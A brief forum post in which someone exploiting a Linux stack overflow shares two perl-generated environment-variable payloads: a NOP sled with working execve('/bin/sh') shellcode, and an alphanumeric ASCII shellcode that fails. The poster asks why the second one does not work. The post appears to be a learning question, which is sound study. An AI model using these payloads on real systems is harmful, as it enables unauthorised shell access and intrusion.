Re: Re: Linux restricted ASCII Shellcode



I'm exploiting the stack overflow by inserting the shellcode in an environment variable:

export SHELLCODE=`perl -e 'print "\x90"x20000'``perl -e 'print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`

And then overwriting the RET address to point somewhere in the NOP section of "SHELLCODE". Pretty simple.
That works perfectly.

But if I try with this environment variable:

export SHELLCODE=`perl -e 'print "\x90"x20000'``perl -e 'print "LLLLZhmeqrX5meqrHTVPPWRPPaQVRSPGWDOfhAMfXf5ECfPDVUajcX0Dob0TodjdY0LohfhmNfXf1Dol0topjYY0Loq0toq0totjJX0Dou0tou0TovjFX0Dow0towjhXfRhnKshhBabivERSvT29"'`

This does not work. I have tried many different ASCII shellcodes, all of them ripped from examples in C style.
What am I doing wrong?
